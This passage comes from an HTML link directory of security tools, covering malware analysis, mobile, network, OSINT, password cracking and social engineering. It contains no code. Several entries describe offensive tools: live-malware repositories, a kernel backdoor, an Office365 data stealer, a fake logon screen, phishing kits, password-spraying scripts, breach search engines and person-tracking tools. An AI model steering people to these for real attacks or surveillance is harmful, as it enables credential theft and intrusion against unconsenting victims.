<td>Proof-of-concept two-stage dropper generator that uses bits from external sources</td> </tr> <tr> <td><a href="https://github.com/SentineLabs/SentinelLabs_RevCore_Tools">SentineLabs/SentinelLabs_RevCore_Tools</a></td> <td>The Windows Malware Analysis Reversing Core Tools</td> </tr> <tr> <td><a href="https://malware.sekoia.fr/new">SEKOIA Dropper Analysis</a></td> <td>SEKOIA Dropper Analysis</td> </tr> <tr> <td><a href="https://github.com/slaughterjames/excelpeek">slaughterjames/excelpeek</a></td> <td>ExcelPeek is a tool designed to help investigate potentially malicious Microsoft Excel files.</td> </tr> <tr> <td><a href="https://github.com/sophos-ai/yaraml_rules">sophos-ai/yaraml_rules</a></td> <td>Security ML models encoded as Yara rules</td> </tr> <tr> <td><a href="https://github.com/SpamScope/spamscope">SpamScope/spamscope</a></td> <td>Fast Advanced Spam Analysis Tool</td> </tr> <tr> <td><a href="https://github.com/SpiderLabs/IOCs-IDPS">SpiderLabs/IOCs-IDPS</a></td> <td>This repository will hold PCAP IOC data related with known malware samples (owner: Bryant Smith)</td> </tr> <tr> <td><a href="https://github.com/strozfriedberg/cobaltstrike-config-extractor">strozfriedberg/cobaltstrike-config-extractor</a></td> <td>Cobalt Strike Beacon configuration extractor and parser.</td> </tr> <tr> <td><a href="https://github.com/t4d/PhishingKitHunter">t4d/PhishingKitHunter</a></td> <td>Find phishing kits which use your brand/organization's files and image.</td> </tr> <tr> <td><a href="https://github.com/target/halogen">target/halogen</a></td> <td>Automatically create YARA rules from malicious documents.</td> </tr> <tr> <td><a href="https://github.com/ThisIsLibra/MalPull">ThisIsLibra/MalPull</a></td> <td>A CLI interface to search for a MD-5/SHA-1/SHA-256 hash on multiple malware databases and download the sample from the first hit</td> </tr> <tr> <td><a href="https://threatshare.io/">ThreatShare</a></td> <td>ThreatShare is an advanced threat tracker that publicly tracks command & control servers for malware.</td> </tr> <tr> <td><a href="https://github.com/tklengyel/drakvuf">tklengyel/drakvuf</a></td> <td>DRAKVUF Black-box Binary Analysis</td> </tr> <tr> <td><a href="https://github.com/tomchop/malcom">tomchop/malcom</a></td> <td>Malcom - Malware Communications Analyzer</td> </tr> <tr> <td><a href="https://pan-unit42.github.io/playbook_viewer/">UNIT 42: Playbook Viewver</a></td> <td>Viewing PAN Unit 42's adversary playbook via web interface</td> </tr> <tr> <td><a href="https://www.unpac.me/#/">UNPACME</a></td> <td>An automated malware unpacking service from OpenAnalysis</td> </tr> <tr> <td><a href="https://github.com/uqcyber/ColdPress">uqcyber/ColdPress</a></td> <td>Extensible Platform for Malware Analysis</td> </tr> <tr> <td><a href="https://github.com/ytisf/theZoo">ytisf/theZoo</a></td> <td>A repository of LIVE malwares for your own joy and pleasure</td> </tr> <tr> <td><a href="https://beta.virusbay.io/">VirusBay</a></td> <td>VirusBay is a web-based, collaboration platform that connects security operations center (SOC) professionals with relevant malware researchers</td> </tr> <tr> <td><a href="https://virusshare.com/">VirusShare</a></td> <td>VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code</td> </tr> <tr> <td><a href="http://vxvault.net/ViriList.php">VX Vault</a></td> <td>VX Vault</td> </tr> <tr> <td><a href="https://github.com/W3ndige/aurora">W3ndige/aurora</a></td> <td>Malware similarity platform with modularity in mind.</td> </tr> <tr> <td><a href="https://github.com/xorhex/mlget">xorhex/mlget</a></td> <td>A golang CLI tool to download malware from a variety of sources.</td> </tr> <tr> <td><a href="https://github.com/zerofox-oss/phishpond">zerofox-oss/phishpond</a></td> <td>Because phishtank was taken.. explore phishing kits in a contained environment!</td> </tr> <tr> <td><a href="https://github.com/zerosum0x0/smbdoor">zerosum0x0/smbdoor</a></td> <td>kernel backdoor via registering a malicious SMB handler</td> </tr> </table> ## Mobile Security <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/ac-pm/Inspeckage">ac-pm/Inspeckage</a></td> <td>Android Package Inspector - dynamic analysis with api hooks, start unexported activities and more. (Xposed Module)</td> </tr> <tr> <td><a href="https://air.line.me/air/product#tab_airgo">AIR GO</a></td> <td>AIR GO detects obfuscation, vulnerabilities, open-source license issues, and malware by analyzing mobile apps and websites. It uses industry-leading technology to detect security threats and provide an improvement plan.</td> </tr> <tr> <td><a href="https://www.apkdetect.com/">apkdetect</a></td> <td>Android malware analysis and classification platform</td> </tr> <tr> <td><a href="https://ibotpeaches.github.io/Apktool/">Apktool</a></td> <td>A tool for reverse engineering Android apk files</td> </tr> <tr> <td><a href="https://github.com/as0ler/r2flutch">as0ler/r2flutch</a></td> <td>Tool to decrypt iOS apps using r2frida</td> </tr> <tr> <td><a href="https://github.com/chaitin/passionfruit">chaitin/passionfruit</a></td> <td>Simple iOS app blackbox assessment tool. Powered by frida.re and vuejs.</td> </tr> <tr> <td><a href="https://github.com/charles2gan/GDA-android-reversing-Tool">charles2gan/GDA-android-reversing-Tool</a></td> <td>GDA is a new fast and powerful decompiler in C++(working without Java VM) for the APK, DEX, ODEX, OAT, JAR, AAR, and CLASS file. which supports malicious behavior detection, privacy leaking detection, vulnerability detection, path solving, packer identification, variable tracking, deobfuscation, python&java scripts, device memory extraction, dat</td> </tr> <tr> <td><a href="https://github.com/dpnishant/appmon">dpnishant/appmon</a></td> <td>AppMon is an automated framework for monitoring and tampering system API calls of native macOS, iOS and android apps. It is based on Frida.</td> </tr> <tr> <td><a href="https://github.com/dmayer/idb">dmayer/idb</a></td> <td>idb is a tool to simplify some common tasks for iOS pentesting and research</td> </tr> <tr> <td><a href="https://labs.mwrinfosecurity.com/tools/drozer/">Drozer</a></td> <td>Comprehensive security and attack framework for Android</td> </tr> <tr> <td><a href="https://github.com/dwisiswant0/apkleaks">dwisiswant0/apkleaks</a></td> <td>Scanning APK file for URIs, endpoints & secrets.</td> </tr> <tr> <td><a href="https://github.com/facebook/mariana-trench/">facebook/mariana-trench</a></td> <td>Our security focused static analysis tool for Android and Java applications.</td> </tr> <tr> <td><a href="https://github.com/frida/frida">frida/frida</a></td> <td>Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.</td> </tr> <tr> <td><a href="https://github.com/iSECPartners/Android-SSL-TrustKiller">iSECPartners/Android-SSL-TrustKiller</a></td> <td>Bypass SSL certificate pinning for most applications</td> </tr> <tr> <td><a href="https://github.com/KJCracks/Clutch">KJCracks/Clutch</a></td> <td>Fast iOS executable dumper</td> </tr> <tr> <td><a href="https://github.com/linkedin/qark">linkedin/qark</a></td> <td>Tool to look for several security related Android application vulnerabilities</td> </tr> <tr> <td><a href="https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security">m0bilesecurity/RMS-Runtime-Mobile-Security</a></td> <td>Runtime Mobile Security (RMS) is a powerful web interface that helps you to manipulate Android Java Classes and Methods at Runtime</td> </tr> <tr> <td><a href="https://github.com/MobSF/Mobile-Security-Framework-MobSF">MobSF/Mobile-Security-Framework-MobSF</a></td> <td>Mobile Security Framework is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing framework capable of performing static analysis, dynamic analysis, malware analysis and web API testing</td> </tr> <tr> <td><a href="https://github.com/mvt-project/mvt">mvt-project/mvt</a></td> <td>MVT is a forensic tool to look for signs of infection in smartphone devices</td> </tr> <tr> <td><a href="https://github.com/mwrlabs/needle">mwrlabs/needle</a></td> <td>The iOS Security Testing Framework</td> </tr> <tr> <td><a href="https://github.com/nccgroup/house">nccgroup/house</a></td> <td>A runtime mobile application analysis toolkit with a Web GUI, powered by Frida, written in Python.</td> </tr> <tr> <td><a href="https://github.com/nygard/class-dump">nygard/class-dump</a></td> <td>Generate Objective-C headers from Mach-O files</td> </tr> <tr> <td><a href="https://beta.pithus.org/about/">Pithus</a></td> <td>Pithus is a free and open-source mobile threat intelligence platform for activists, journalists, NGOs, researchers...</td> </tr> <tr> <td><a href="https://github.com/pxb1988/dex2jar">pxb1988/dex2jar</a></td> <td>Tools to work with android .dex and java .class files</td> </tr> <tr> <td><a href="https://github.com/quark-engine/quark-engine">quark-engine/quark-engine</a></td> <td>An Obfuscation-Neglect Android Malware Scoring System</td> </tr> <tr> <td><a href="https://github.com/RealityNet/kobackupdechttps://github.com/RealityNet/kobackupdec">RealityNet/kobackupdec</a></td> <td>Huawei backup decryptor</td> </tr> <tr> <td><a href="https://github.com/securing/IOSSecuritySuite">securing/IOSSecuritySuite</a></td> <td>iOS platform security & anti-tampering Swift library</td> </tr> <tr> <td><a href="https://github.com/sensepost/objection">sensepost/objection</a></td> <td>objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.</td> </tr> <tr> <td><a href="https://github.com/skylot/jadx">skylot/jadx</a></td> <td>Dex to Java decompiler</td> </tr> <tr> <td><a href="https://github.com/stefanesser/dumpdecrypted">stefanesser/dumpdecrypted</a></td> <td>Dumps decrypted mach-o files from encrypted iPhone applications from memory to disk. This tool is necessary for security researchers to be able to look under the hood of encryption.</td> </tr> <tr> <td><a href="https://github.com/swdunlop/AndBug">swdunlop/AndBug</a></td> <td>Android Debugging Library</td> </tr> <tr> <td><a href="https://github.com/tcurdt/iProxy">tcurdt/iProxy</a></td> <td>Let's you connect your laptop to the iPhone to surf the web.</td> </tr> </table> ## Network Security <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://arkime.com/">Arkime</a></td> <td>Arkime (formerly Moloch) is a large scale, open source, indexed packet capture and search tool.</td> </tr> <tr> <td><a href="https://github.com/aol/moloch">aol/moloch</a></td> <td>Moloch is an open source, large scale, full packet capturing, indexing, and database system</td> </tr> <tr> <td><a href="https://github.com/austin-taylor/flare">austin-taylor/flare</a></td> <td>An analytical framework for network traffic and behavioral analytics</td> </tr> <tr> <td><a href="https://github.com/Ben0xA/HoneyCreds">Ben0xA/HoneyCreds</a></td> <td>HoneyCreds network credential injection to detect responder and other network poisoners.</td> </tr> <tr> <td><a href="https://github.com/certego/PcapMonkey">certego/PcapMonkey</a></td> <td>PcapMonkey will provide an easy way to analyze pcap using the latest version of Suricata and Zeek.</td> </tr> <tr> <td><a href="https://github.com/crowdsecurity/crowdsec/">crowdsecurity/crowdsec/</a></td> <td>Crowdsec - An open-source, lightweight agent to detect and respond to bad behaviours. It also automatically benefits from our global community-wide IP reputation database.</td> </tr> <tr> <td><a href="https://github.com/blechschmidt/massdns">blechschmidt/massdns</a></td> <td>A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration)</td> </tr> <tr> <td><a href="https://github.com/byt3bl33d3r/MITMf">byt3bl33d3r/MITMf</a></td> <td>Framework for Man-In-The-Middle attacks</td> </tr> <tr> <td><a href="https://github.com/cisco/mercury">cisco/mercury</a></td> <td>Mercury: network metadata capture and analysis</td> </tr> <tr> <td><a href="https://github.com/ddosify/ddosify">ddosify/ddosify</a></td> <td>High-performance load testing tool, written in Golang.</td> </tr> <tr> <td><a href="https://github.com/dhoelzer/ShowMeThePackets">dhoelzer/ShowMeThePackets</a></td> <td>Useful network monitoring, analysis, and active response tools used or mentioned in the SANS SEC503 course</td> </tr> <tr> <td><a href="https://dnsdumpster.com/">DNSdumpster.com</a></td> <td>dns recon & research, find & lookup dns records</td> </tr> <tr> <td><a href="https://github.com/eciavatta/caronte">eciavatta/caronte</a></td> <td>A tool to analyze the network flow during attack/defence capture the flag competitions</td> </tr> <tr> <td><a href="https://github.com/eldraco/domain_analyzer/">eldraco/domain_analyzer</a></td> <td>Analyze the security of any domain by finding all the information possible. Made in python.</td> </tr> <tr> <td><a href="https://github.com/fireeye/flare-fakenet-ng">fireeye/flare-fakenet-ng</a></td> <td>FakeNet-NG - Next Generation Dynamic Network Analysis Tool</td> </tr> <tr> <td><a href="https://github.com/qeeqbox/chameleon">qeeqbox/chameleon</a></td> <td>Customizable honeypots for monitoring network traffic, bots activities and username\password credentials (DNS, HTTP Proxy, HTTP, HTTPS, SSH, POP3, IMAP, STMP, RDP, VNC, SMB, SOCKS5, Redis, TELNET, Postgres and MySQL)</td> </tr> <tr> <td><a href="https://github.com/infobyte/evilgrade">infobyte/evilgrade</a></td> <td>Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has it's own WebServer and DNSServer modules. Easy to set up new settings, and has an autoconfiguration when new binary agents are set.</td> </tr> <tr> <td><a href="https://github.com/joswr1ght/cowpatty">joswr1ght/cowpatty</a></td> <td>coWPAtty: WPA2-PSK Cracking</td> </tr> <tr> <td><a href="https://github.com/joswr1ght/nm2lp">joswr1ght/nm2lp</a></td> <td>Convert Windows Netmon Monitor Mode Wireless Packet Captures to Libpcap Format</td> </tr> <tr> <td><a href="https://github.com/michenriksen/aquatone">michenriksen/aquatone</a></td> <td>AQUATONE is a set of tools for performing reconnaissance on domain names. It can discover subdomains on a given domain by using open sources as well as the more common subdomain dictionary brute force approach. After subdomain discovery, AQUATONE can then scan the hosts for common web ports and HTTP headers, HTML bodies and screenshots can be gathered and consolidated into a report for easy analysis of the attack surface.</td> </tr> <tr> <td><a href="https://github.com/nesfit/NetfoxDetective/">nesfit/NetfoxDetective</a></td> <td>NFX Detective is a novel Network forensic analysis tool that implements methods for extraction of application content from communication using supported protocols.</td> </tr> <tr> <td><a href="https://scan.netlab.360.com">NetworkScan Mon</a></td> <td>NetworkScan Monitor by Netlab 360</td> </tr> <tr> <td><a href="https://github.com/odedshimon/BruteShark">odedshimon/BruteShark</a></td> <td>BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files)</td> </tr> <tr> <td><a href="https://packettotal.com/">PacketTotal</a></td> <td>A free, online PCAP analysis engine</td> </tr> <tr> </tr> <td><a href="https://github.com/Phenomite/AMP-Research">Phenomite/AMP-Research</a></td> <td>Research on UDP/TCP amplification vectors, payloads and mitigations against their use in DDoS Attacks</td> </tr> <tr> <td><a href="https://www.netresec.com/?page=PolarProxy">PolarProxy</a></td> <td>PolarProxy is a transparent SSL/TLS proxy created for incident responders and malware researchers. PolarProxy is primarily designed to intercept and decrypt TLS encrypted traffic from malware. PolarProxy decrypts and re-encrypts TLS traffic, while also saving the decrypted traffic in a PCAP file that can be loaded into Wireshark or an intrusion detection system (IDS).</td> </tr> <tr> <td><a href="https://github.com/secureworks/dalton">secureworks/dalton</a></td> <td>Suricata and Snort IDS rule and pcap testing system</td> </tr> <tr> <td><a href="https://github.com/sensepost/routopsy">sensepost/routopsy</a></td> <td>Routopsy is a toolkit built to attack often overlooked networking protocols. Routopsy currently supports attacks against Dynamic Routing Protocols (DRP) and First-Hop Redundancy Protocols (FHRP).</td> </tr> <tr> <td><a href="https://github.com/USArmyResearchLab/Dshell">USArmyResearchLab/Dshell</a></td> <td>An extensible network forensic analysis framework. Enables rapid development of plugins to support the dissection of network packet captures.</td> </tr> <tr> <td><a href="https://wigle.net/">WiGLE</a></td> <td>Maps and database of 802.11 wireless networks, with statistics, submitted by wardrivers, netstumblers, and net huggers.</td> </tr> <tr> <td><a href="https://wireedit.com/">WireEdit</a></td> <td>First-Of-A-Kind And The Only Full Stack WYSIWYG Pcap Editor</td> </tr> <tr> <td><a href="https://zmap.io/">The ZMap Project</a></td> <td>The ZMap Project is a collection of open source tools that enable researchers to perform large-scale studies of the hosts and services that compose the public Internet.</td> </tr> </table> ## Open-source Intelligence (OSINT) <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/althonos/InstaLooter">althonos/InstaLooter</a></td> <td>Another API-less Instagram pictures and videos downloader.</td> </tr> <tr> <td><a href="https://github.com/americanexpress/earlybird">americanexpress/earlybird</a></td> <td>EarlyBird is a sensitive data detection tool capable of scanning source code repositories for clear text password violations, PII, outdated cryptography methods, key files and more.</td> </tr> <tr> <td><a href="https://github.com/arch4ngel/peasant">arch4ngel/peasant</a></td> <td>LinkedIn reconnaissance tool</td> </tr> <tr> <td><a href="http://bit.ly/bcattools">Bellingcat's Online Investigation Toolkit</a></td> <td>Welcome to Bellingcats freely available online open source investigation toolkit.</td> </tr> <tr> <td><a href="https://github.com/byt3bl33d3r/WitnessMe">byt3bl33d3r/WitnessMe</a></td> <td>Web Inventory tool, takes screenshots of webpages using Pyppeteer (headless Chrome/Chromium) and provides some extra bells & whistles to make life easier.</td> </tr> <tr> <td><a href="https://cellidfinder.com/">CellID Finder</a></td> <td>Find GSM base stations cell id coordinates</a></td> </tr> <tr> <td><a href="https://www.cellmapper.net">CellMapper</a></td> <td>Cellular Coverage and Tower Map</a></td> </tr> <tr> <td><a href="https://crt.sh/">Certificate Search</a></td> <td>crt.sh | Certificate</td> </tr> <tr> <td><a href="https://start.me/p/EL84Km/cse-utopia">CSE Utopia</a></td> <td>CSE Utopia</td> </tr> <tr> <td><a href="https://github.com/danieleperera/onioningestor">danieleperera/onioningestor</a></td> <td>An extendable tool to Collect, Crawl and Monitor onion sites on tor network and index collected information on Elasticsearch</td> </tr> <tr> <td><a href="https://www.dargle.net/search">Dargle</a></td> <td>Dargle serves as a data aggregation platform for dark web domains. Hidden services on the dark web prove difficult to navigate, but by crawling the clear web, one can accumulate a directory of sorts for these hidden services.</td> </tr> <tr> <td><a href="https://dark.fail/">dark.fail: Is a darknet site online?</a></td> <td>dark.fail: Is a darknet site online?</td> </tr> <tr> <td><a href="https://darksearch.io/">DarkSearch</a></td> <td>The 1st Real Dark Web Search Engine</td> </tr> <tr> <td><a href="https://domainbigdata.com/">DomainBigData</a></td> <td>DomainBigData is a big database of domains and whois records</td> </tr> <tr> <td><a href="https://github.com/danieliu/play-scraper">danieliu/play-scraper</a></td> <td>A web scraper to retrieve application data from the Google Play Store.</td> </tr> <tr> <td><a href="https://github.com/DataSploit/datasploit">DataSploit/datasploit</a></td> <td>An #OSINT Framework to perform various recon techniques on Companies, People, Phone Number, Bitcoin Addresses, etc., aggregate all the raw data, and give data in multiple formats.</td> </tr> <tr> <td><a href="https://github.com/felix83000/Watcher">felix83000/Watcher</a></td> <td>Watcher - Open Source Cybersecurity Threat Hunting Platform. Developed with Django & React JS.</td> </tr> <tr> <td><a href="https://tools.epieos.com/google-account.php">Epieos Tools - Google Account Finder</a></td> <td>An online tool to retrieve sensitive information like google maps reviews, public photos, displayed name, usage of google services such as YouTube, Hangouts</td> </tr> <tr> <td><a href="https://fofa.so/">FOFA Pro</a></td> <td>The Cyberspace Search Engine, Security Situation Awareness</td> </tr> <tr> <td><a href="https://grep.app/">grep.app</a></td> <td>Search across a half million git repos</td> </tr> <tr> <td><a href="https://viz.greynoise.io/">GreyNoise Visualizer</a></td> <td>GreyNoise Visualizer</td> </tr> <tr> <td><a href="https://github.com/haccer/twint">haccer/twint</a></td> <td>An advanced Twitter scraping & OSINT tool written in Python that doesn't use Twitter's API, allowing you to scrape a user's followers, following, Tweets and more while evading most API limitations.</td> </tr> <tr> <td><a href="https://github.com/hessman/gcert">hessman/gcert</a></td> <td>Retrieves information about a given domain from the Google Transparency Report</td> </tr> <tr> <td><a href="https://iknowwhatyoudownload.com/en/peer/">I Know What You Download</a></td> <td>Torrent downloads and distributions for IP</td> </tr> <tr> <td><a href="https://www.immuniweb.com/radar/">ImmuniWeb</a></td> <td>Domain Security Test | Detect Dark Web Exposure, Phishing, Squatting and Trademark Infringement</td> </tr> <tr> <td><a href="https://intelx.io/">IntelligenceX</a></td> <td>Search Tor, I2P, data leaks, public web.| </td> </tr> <tr> <td><a href="https://github.com/InQuest/omnibus">InQuest/omnibus</a></td> <td>The OSINT Omnibus</td> </tr> <tr> <td><a href="https://github.com/intelowlproject/IntelOwl">intelowlproject/IntelOwl</a></td> <td>Intel Owl: analyze files, domains, IPs in multiple ways from a single API at scale</td> </tr> <tr> <td><a href="https://github.com/iptv-org/iptv">iptv-org/iptv</a></td> <td>Collection of 8000+ publicly available IPTV channels from all over the world</td> </tr> <tr> <td><a href="https://github.com/jofpin/trape">jofpin/trape</a></td> <td>People tracker on the Internet: OSINT analysis and research tool.</td> </tr> <tr> <td><a href="https://github.com/khast3x/h8mail">khast3x/h8mail</a></td> <td>Email OSINT & Password breach hunting tool, locally or using premium services. Supports chasing down related email</td> </tr> <tr> <td><a href="https://github.com/knownsec/Kunyu">knownsec/Kunyu</a></td> <td>Kunyu, more efficient corporate asset collection</td> </tr> <tr> <td><a href="https://github.com/lanrat/certgraph">lanrat/certgraph</a></td> <td>An open source intelligence tool to crawl the graph of certificate Alternate Names</td> </tr> <tr> <td><a href="https://leakix.net/">LeakIX</a></td> <td>This project goes around the internet and finds services to index them.</td> </tr> <tr> <td><a href="https://leak-lookup.com/">Leak-Lookup</a></td> <td>Data Breach Search Engine</td> </tr> <tr> <td><a href="https://github.com/leapsecurity/InSpy">leapsecurity/InSpy</a></td> <td>A python based LinkedIn enumeration tool</td> </tr> <tr> <td><a href="https://lookyloo.circl.lu/">Lookyloo</a></td> <td>Web forensics tool</td> </tr> <tr> <td><a href="https://github.com/loseys/Oblivion">loseys/Oblivion</a></td> <td>Data leak checker & OSINT Tool</td> </tr> <tr> <td><a href="https://github.com/Malfrats/xeuledoc">Malfrats/xeuledoc</a></td> <td>Fetch information about a public Google document.</td> </tr> <tr> <td><a href="https://github.com/medialab/minet">medialab/minet</a></td> <td>A webmining CLI tool & library for python.</td> </tr> <tr> <td><a href="https://github.com/megadose/holehe">megadose/holehe</a></td> <td>holehe allows you to check if the mail is used on different sites like twitter, instagram and will retrieve information on sites with the forgotten password function.</td> </tr> <tr> <td><a href="https://github.com/mxrch/ghunt">mxrch/ghunt</a></td> <td>GHunt is an OSINT tool to extract a lot of informations of someone's Google Account email.</td> </tr> <tr> <td><a href="https://github.com/nccgroup/scrying">nccgroup/scrying</a></td> <td>A tool for collecting RDP, web and VNC screenshots all in one place</td> </tr> <tr> <td><a href="https://github.com/ninoseki/mihari">ninoseki/mihari</a></td> <td>A helper to run OSINT queries & manage results continuously</td> </tr> <tr> <td><a href="https://github.com/ninoseki/mitaka">ninoseki/mikata</a></td> <td>A browser extension for OSINT search</td> </tr> <tr> <td><a href="https://data.occrp.org/">OCCRP Data</a></td> <td>Search 102m public records and leaks from 179 sources</td> </tr> <tr> <td><a href="https://opencellid.org">OpenCelliD</a></td> <td>OpenCelliD - Largest Open Database of Cell Towers & Geolocation - by Unwired Labs</td> </tr> <tr> <td><a href="https://osint.sh/">OSINT.SH</a></td> <td>ALL IN ONE INFORMATION GATHERING TOOLS</td> </tr> <tr> <td><a href="https://github.com/OWASP/Amass">OWASP/Amass</a></td> <td>In-depth Attack Surface Mapping and Asset Discovery</td> </tr> <tr> <td><a href="https://github.com/PaperMtn/gitlab-watchman">PaperMtn/gitlab-watchman</a></td> <td>Monitoring GitLab for sensitive data shared publicly</td> </tr> <tr> <td><a href="https://psbdmp.ws/">Pastebin dump collection</a></td> <td>Pastebin dump collection</td> </tr> <tr> <td><a href="https://github.com/Patrowl/PatrowlHears">Patrowl/PatrowlHears</a></td> <td>PatrowlHears - Vulnerability Intelligence Center / Exploits</td> </tr> <tr> <td><a href="https://phonebook.cz/">Phonebook.cz</a></td> <td>Phonebook lists all domains, email addresses, or URLs for the given input domain.</td> </tr> <tr> <td><a href="https://github.com/qeeqbox/social-analyzer">qeeqbox/social-analyzer</a></td> <td>API, CLI & Web App for analyzing & finding a person's profile across 350+ social media websites (Detections are updated regularly)</td> </tr> <tr> <td><a href="https://hackertarget.com/recon-ng-tutorial/">Recon-NG</a></td> <td>Recon-ng is a reconnaissance tool with an interface similar to Metasploit. Running recon-ng from the command line you enter a shell like environment where you can configure options, perform recon and output results to different report types.</td> </tr> <tr> <td><a href="https://github.com/s-rah/onionscan">s-rah/onionscan</a></td> <td>OnionScan is a free and open source tool for investigating the Dark Web.</td> </tr> <tr> <td><a href="https://same.energy/">same.energy</a></td> <td>Tweet Search Engine</td> </tr> <tr> <td><a href="https://shademap.app/">Shade Map</a></td> <td>View Shade on Map</td> </tr> <tr> <td><a href="https://snusbase.com/">SnusBase</a></td> <td>The longest standing data breach search engine.</td> </tr> <tr> <td><a href="https://github.com/sshell/reddit-analyzer">sshell/reddit-analyzer</a></td> <td>find out when and where someone is posting to reddit</td> </tr> </tr> <tr> <td><a href="http://www.spiderfoot.net/">SpiderFoot</a></td> <td>SpiderFoot - Opensource Intelligence Automation</td> </tr> <tr> <td><a href="https://github.com/sundowndev/PhoneInfoga">sundowndev/PhoneInfoga</a></td> <td>Advanced information gathering & OSINT framework for phone numbersAdvanced information gathering & OSINT framework for phone numbers</td> </tr> <tr> <td><a href="https://github.com/superhedgy/AttackSurfaceMapper">superhedgy/AttackSurfaceMapper</a></td> <td>AttackSurfaceMapper is a tool that aims to automate the reconnaissance process.</td> </tr> <tr> <td><a href="https://github.com/thewhiteh4t/nexfil">thewhiteh4t/nexfil</a></td> <td>OSINT tool for finding profiles by username</td> </tr> <tr> <td><a href="https://github.com/vysecurity/LinkedInt">vysecurity/LinkedInt</a></td> <td>LinkedIn Recon Tool</td> </tr> <tr> <td><a href="https://github.com/WebBreacher/WhatsMyName">WebBreacher/WhatsMyName</a></td> <td>This repository has the unified data required to perform user enumeration on various websites. Content is in a JSON file and can easily be used in other projects.</td> </tr> <tr> <td><a href="https://whatsmyname.app/">WhatsMyName Web</a></td> <td>This tool allows you to enumerate usernames across many websites</td> </tr> <tr> <td><a href="https://github.com/woj-ciech/kamerka">woj-ciech/kamerka</a></td> <td>Build interactive map of cameras from Shodan</td> </tr> <tr> <td><a href="https://github.com/woj-ciech/SocialPath">woj-ciech/SocialPath</a></td> <td>Track users across social media platform</td> </tr> <tr> <td><a href="https://github.com/yogeshojha/rengine">yogeshojha/rengine</a></td> <td>reNgine is an automated reconnaissance framework meant for information gathering during penetration testing of web applications. reNgine has customizable scan engines, which can be used to scan the websites, endpoints, and gather information.</td> </tr> </table> ## Password Cracking and Wordlists <table> <tr> <td><a href="https://github.com/berzerk0/Probable-Wordlists">berzerk0/Probable-Wordlists</a></td> <td>Wordlists sorted by probability originally created for password generation and testing - make sure your passwords aren't popular!</td> </tr> <tr> <td><a href="https://github.com/byt3bl33d3r/SprayingToolkit">byt3bl33d3r/SprayingToolkit</a></td> <td>Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient</td> </tr> <tr> <td><a href="https://github.com/c6fc/npk">c6fc/npk</a></td> <td>A mostly-serverless distributed hash cracking platform</td> </tr> <tr> <td><a href="https://github.com/f0cker/crackq">f0cker/crackq</a></td> <td>CrackQ: A Python Hashcat cracking queue system</td> </tr> <tr> <td><a href="https://github.com/fireeye/gocrack">fireeye/gocrack</a></td> <td>GoCrack provides APIs to manage password cracking tasks across supported cracking engines.</td> </tr> <tr> <td><a href="https://github.com/JoelGMSec/Cloudtopolis">JoelGMSec/Cloudtopolis</a></td> <td>Zero Infrastructure Password Cracking</td> </tr> <tr> <td><a href="https://gitlab.com/l0phtcrack/l0phtcrack">l0phtcrack/l0phtcrack</a></td> <td>L0phtCrack Password Auditor</td> </tr> <tr> <td><a href="https://github.com/sc0tfree/mentalist">sc0tfree/mentalist</a></td> <td>Mentalist is a graphical tool for custom wordlist generation. It utilizes common human paradigms for constructing passwords and can output the full wordlist as well as rules compatible with Hashcat and John the Ripper.</td> </tr> <tr> <td><a href="https://github.com/trustedsec/hate_crack">trustedsec/hate_crack</a></td> <td>A tool for automating cracking methodologies through Hashcat from the TrustedSec team.</td> </tr> <tr> <td><a href="https://github.com/danielmiessler/SecLists">danielmiessler/SecLists</a></td> <td>SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more.</td> </tr> </table> ## Social Engineering <table> <tr> <td><b>Link</b></td> <td><b>Description</b></td> </tr> <tr> <td><a href="https://github.com/AlteredSecurity/365-Stealer/">AlteredSecurity/365-Stealer/</a></td> <td>365-Stealer is the tool written in python3 which steals data from victims office365 by using access_token which we get by phishing. It steals outlook mails, attachments, OneDrive files, OneNote notes and injects macros.</td> </tr> <tr> <td><a href="https://github.com/bitsadmin/fakelogonscreen">bitsadmin/fakelogonscreen</a></td> <td>Fake Windows logon screen to steal passwords</td> </tr> <tr> <td><a href="https://github.com/BiZken/PhishMailer">BiZken/PhishMailer</a></td> <td>Generate Professional Phishing Emails Fast And Easy</td> </tr> <tr> <td><a href="https://github.com/boxug/trape">boxug/trape</a></td> <td>People tracker on the Internet: Learn to track the world, to avoid being traced.</td> </tr> <tr> <td><a href="https://github.com/dafthack/MailSniper">dafthack/MailSniper</a></td> <td>MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used as a non-administrative user to search their own email, or by an administrator to search the mailboxes of every user in a domain.</td> </tr> <tr> <td><a href="https://github.com/drk1wi/Modlishka">drk1wi/Modlishka</a></td> <td>Modlishka. Reverse Proxy. Phishing NG.</td> </tr> <tr> <td><a href="https://github.com/certsocietegenerale/swordphish-awareness">certsocietegenerale/swordphish-awareness</a></td> <td>Swordphish is a plateform allowing to create and manage fake phishing campaigns.</td> </tr> <tr> <td><a href="https://github.com/curtbraz/Phishing-API">curtbraz/Phishing-API</a></td> <td>Comprehensive Web Based Phishing Suite of Tools for Rapid Deployment and Real-Time Alerting!</td> </tr> <tr> <td><a href="https://emailrep.io/">Simple Email Reputation</a></td> <td>Illuminate the "reputation" behind an email address</td> </tr> <tr> <td><a href="https://github.com/fireeye/ReelPhish">fireeye/ReelPhish</a></td> <td>ReelPhish: A Real-Time Two-Factor Phishing Tool</td> </tr> <tr> <td><a href="https://github.com/fkasler/phishmonger">fkasler/phishmonger</a></td> <td>Phishing Framework for Pentesters</td> </tr> <tr> <td><a 